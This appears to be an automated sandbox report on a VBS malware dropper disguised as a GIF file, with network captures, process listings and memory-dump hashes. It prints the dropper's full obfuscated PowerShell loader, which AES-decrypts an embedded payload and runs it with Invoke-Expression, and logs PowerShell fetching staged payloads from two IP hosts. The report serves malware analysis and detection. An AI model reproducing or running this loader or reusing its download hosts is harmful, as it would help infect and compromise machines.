        Jul 27, 2024 13:32:06.580948114 CEST4971380192.168.2.6192.3.176.174
        Jul 27, 2024 13:32:06.585756063 CEST8049713192.3.176.174192.168.2.6
        Jul 27, 2024 13:32:07.993077040 CEST8049713192.3.176.174192.168.2.6
        Jul 27, 2024 13:32:07.993249893 CEST4971380192.168.2.6192.3.176.174
        Jul 27, 2024 13:32:07.993249893 CEST4971380192.168.2.6192.3.176.174
        Jul 27, 2024 13:32:08.001913071 CEST8049713192.3.176.174192.168.2.6
        Jul 27, 2024 13:32:08.114707947 CEST8049710198.46.176.133192.168.2.6
        Jul 27, 2024 13:32:08.114777088 CEST4971080192.168.2.6198.46.176.133
        Jul 27, 2024 13:32:08.127727985 CEST4971080192.168.2.6198.46.176.133
        TimestampSource PortDest PortSource IPDest IP
        Jul 27, 2024 13:32:20.705373049 CEST53614741.1.1.1192.168.2.6
        • 198.46.176.133
        • 192.3.176.174
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.649710198.46.176.133802144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        Jul 27, 2024 13:32:02.605643034 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
        Host: 198.46.176.133
        Connection: Keep-Alive
        Jul 27, 2024 13:32:03.102173090 CEST1236INHTTP/1.1 200 OK
        Date: Sat, 27 Jul 2024 11:32:03 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
        Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
        ETag: "1d7285-61ce2d35c4b0c"
        Accept-Ranges: bytes
        Content-Length: 1929861
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: image/jpeg
        Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
        Jul 27, 2024 13:32:03.102224112 CEST1236INData Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
        Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
        Jul 27, 2024 13:32:03.102258921 CEST1236INData Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
        Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
        Jul 27, 2024 13:32:03.102348089 CEST1236INData Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
        Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
        Jul 27, 2024 13:32:03.102382898 CEST1236INData Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
        Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
        Jul 27, 2024 13:32:03.102427006 CEST1236INData Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
        Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
        Jul 27, 2024 13:32:03.102461100 CEST1236INData Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
        Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
        Jul 27, 2024 13:32:03.102494955 CEST1236INData Raw: 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb
        Data Ascii: G-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j}0=pk`ESqHx1>~M.#z_
        Jul 27, 2024 13:32:03.102529049 CEST1236INData Raw: 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76
        Data Ascii: :9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v
        Jul 27, 2024 13:32:03.102564096 CEST1236INData Raw: e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61
        Data Ascii: gmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUe
        Jul 27, 2024 13:32:03.107780933 CEST1236INData Raw: 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5
        Data Ascii: Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO!"=y#_o^m Pq.by/Dh-6q'@4)*}eb-G=\r(,}if,


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.649711192.3.176.174802144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        Jul 27, 2024 13:32:05.118489027 CEST74OUTGET /60/WDER.txt HTTP/1.1
        Host: 192.3.176.174
        Connection: Keep-Alive


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.649713192.3.176.174802144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        Jul 27, 2024 13:32:06.580948114 CEST74OUTGET /60/WDER.txt HTTP/1.1
        Host: 192.3.176.174
        Connection: Keep-Alive


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:07:31:58
        Start date:27/07/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs"
        Imagebase:0x7ff709c60000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:07:31:58
        Start date:27/07/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
        Imagebase:0x7ff6e3d50000
        File size:452'608 bytes
        MD5 hash:04029E121A0CFA5991749937DD22A1D9
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:3
        Start time:07:31:58
        Start date:27/07/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff66e660000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Reset < >
          Memory Dump Source
          • Source File: 00000002.00000002.2316487110.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34720000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8a3d79b8adff7d3db99ce93bd50bd7973cd2a56c2fa59b27a32d7d413cf8e587
          • Instruction ID: e122062deb073fc0feac111aaba830f2f61c550f41c02585fa5408007287d53c
          • Opcode Fuzzy Hash: 8a3d79b8adff7d3db99ce93bd50bd7973cd2a56c2fa59b27a32d7d413cf8e587
          • Instruction Fuzzy Hash: 7C9226A2B0EB8A4FE7A69B2858A51B47BE1EF57250B1801FFD18DC7193DD1DAC05C381
          Memory Dump Source
          • Source File: 00000002.00000002.2315936182.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34650000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 08bcee2902feff981734f557964f5c8016b5f4fb688ec9481fe72fdecfe24bd2
          • Instruction ID: 1904ddc95683b81e549a2a857daecdbd8a2c82d9c31bf354dd103f5601d04c31
          • Opcode Fuzzy Hash: 08bcee2902feff981734f557964f5c8016b5f4fb688ec9481fe72fdecfe24bd2
          • Instruction Fuzzy Hash: EC51FE71E14A1D8FDB94EFA8C895AECBBF1FF69301F50016AD409E7292DB75A841CB40
          Memory Dump Source
          • Source File: 00000002.00000002.2316487110.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34720000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 70c8a6c128378445c8a0e3bf6db6056ebca734be3fefb1734214972c3624c1b9
          • Instruction ID: 20af121c1763aef94beeea1ccd522cf05b004af72557cf40f1f848db8c1adade
          • Opcode Fuzzy Hash: 70c8a6c128378445c8a0e3bf6db6056ebca734be3fefb1734214972c3624c1b9
          • Instruction Fuzzy Hash: 0F415192A0F7C54FE7575A7818A90643FA0EF5729070E01FBD098CB1A3E81DAD099362
          Memory Dump Source
          • Source File: 00000002.00000002.2316487110.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34720000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 33c97e92ad4325e7995454149478e6d8a6060fc74a85dabeb9d3fa3c1b64528a
          • Instruction ID: eaf25e5bfdf9d2fcf0a9d30707034a54702eed43266859eaec83458a5313f3f8
          • Opcode Fuzzy Hash: 33c97e92ad4325e7995454149478e6d8a6060fc74a85dabeb9d3fa3c1b64528a
          • Instruction Fuzzy Hash: AF41A192A0F3C54FE3575A7818B91643FA0EF57294B1D01FBD098CB1A3E81DAD0AD362
          Memory Dump Source
          • Source File: 00000002.00000002.2316487110.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34720000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a921f3dfa4c37489c887e07ec9c6da943e5c6060ad6f5ab3e5428b11f5bbea42
          • Instruction ID: c68812050235368bb36b6ee8c0639b5e194784d6ce3f61b1a294c814d2d7b2ea
          • Opcode Fuzzy Hash: a921f3dfa4c37489c887e07ec9c6da943e5c6060ad6f5ab3e5428b11f5bbea42
          • Instruction Fuzzy Hash: 02212972B0CE198FEBA196AC64A52F9B3E1EF94260B5401F7D50ED3292DD1DBC0183C0
          Memory Dump Source
          • Source File: 00000002.00000002.2315936182.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34650000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6fa0c1df0529c257205177405531842769d4720fd81b6f65c985a473df4318a1
          • Instruction ID: 17f74cc8ddc4e0292b310a9669605ca67264498816eb9ccc6b23b418f2a22546
          • Opcode Fuzzy Hash: 6fa0c1df0529c257205177405531842769d4720fd81b6f65c985a473df4318a1
          • Instruction Fuzzy Hash: 1E01A77020CB0C4FD744EF0CE051AA9B3E0FB85324F10056DE58AC3651D636E881CB41
          Memory Dump Source
          • Source File: 00000002.00000002.2316487110.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34720000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: de44a2151c9b728ad1d09cc6feb868e6684e9d8b8c826a3a063e2c21555d2853
          • Instruction ID: 71c5240af776bed2056db8dfb286efc0a004bc34244ae77433eed821233a9159
          • Opcode Fuzzy Hash: de44a2151c9b728ad1d09cc6feb868e6684e9d8b8c826a3a063e2c21555d2853
          • Instruction Fuzzy Hash: FCF0FC52F0DE195AF6E5926C15652B8A1C2DF95251B4801BBD50ED3292DD0CBC0113C1
          Memory Dump Source
          • Source File: 00000002.00000002.2316487110.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34720000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2be23b701ca79dafc634f7c3f171443734bc866f6a4695d38e258aa99ad12edd
          • Instruction ID: dbdfae24f646ccb79b321c3a637e02bbc360c0778d3a27486bcdc7ef24da4efe
          • Opcode Fuzzy Hash: 2be23b701ca79dafc634f7c3f171443734bc866f6a4695d38e258aa99ad12edd
          • Instruction Fuzzy Hash: E7F0E263F0DE994BE7A195AC24A52F872C1DFA55A079802B3DA4ED7282DC18AC0143C0
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2315936182.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34650000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: ,P_^$-P_^
          • API String ID: 0-2410056697
          • Opcode ID: afaf0bec6c2ac27a478af0fc3aa35261f7585265d2e19ef57e53cf161b29cc6c
          • Instruction ID: 79d18ad7a7a7ed2ed4a89b0f01126b3c117e0ab713203d1a43df51a64e72d821
          • Opcode Fuzzy Hash: afaf0bec6c2ac27a478af0fc3aa35261f7585265d2e19ef57e53cf161b29cc6c
          • Instruction Fuzzy Hash: 55618793E0D7D62EE723967C68F61D66F99EF53268B0940F7D2D8CE093AD0C28066211
          Memory Dump Source
          • Source File: 00000002.00000002.2315936182.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34650000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f6ce2ade0f542a5182ea85d341972ce3acb10c5364fd2ed5a60b32f3807df185
          • Instruction ID: a4a57c10294830165acc7e3f778b625ffff0c3d2d8c7d068c1ef8ec2667c07d4
          • Opcode Fuzzy Hash: f6ce2ade0f542a5182ea85d341972ce3acb10c5364fd2ed5a60b32f3807df185
          • Instruction Fuzzy Hash: 5F814166A0D7D21EE7239B7D58F54EA3FA4DF57224B0901F7C6D4CB093EA08140A9B61
          Memory Dump Source
          • Source File: 00000002.00000002.2315936182.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34650000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9d75628a83d2d46a8b02b1e430fbdb23c44c4edaf6138ba5d6ae8501ddf696a8
          • Instruction ID: 4f834064befc66b6138151c5170983ad5e572192550dbeac97eec0051fe3bc13
          • Opcode Fuzzy Hash: 9d75628a83d2d46a8b02b1e430fbdb23c44c4edaf6138ba5d6ae8501ddf696a8
          • Instruction Fuzzy Hash: F3515A7BB0D3925EE222DBADB8E54DB3B58DF9323970900F7D2C5C6053D91C140A9A71
          Memory Dump Source
          • Source File: 00000002.00000002.2315936182.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ffd34650000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 06dc96c4d8954fe68c1c918d5b168041d4d0e6d2ceed2063a11c6930bc4e3d6d
          • Instruction ID: 9550012cc76edcc0553a597340d84b1c90b56a3434a8666af403fb352b500a6c
          • Opcode Fuzzy Hash: 06dc96c4d8954fe68c1c918d5b168041d4d0e6d2ceed2063a11c6930bc4e3d6d
          • Instruction Fuzzy Hash: F831767FB0C2615EE220F7EDF8A64EB3758DF9123630400BBD2C8C5453DD18544A4AA4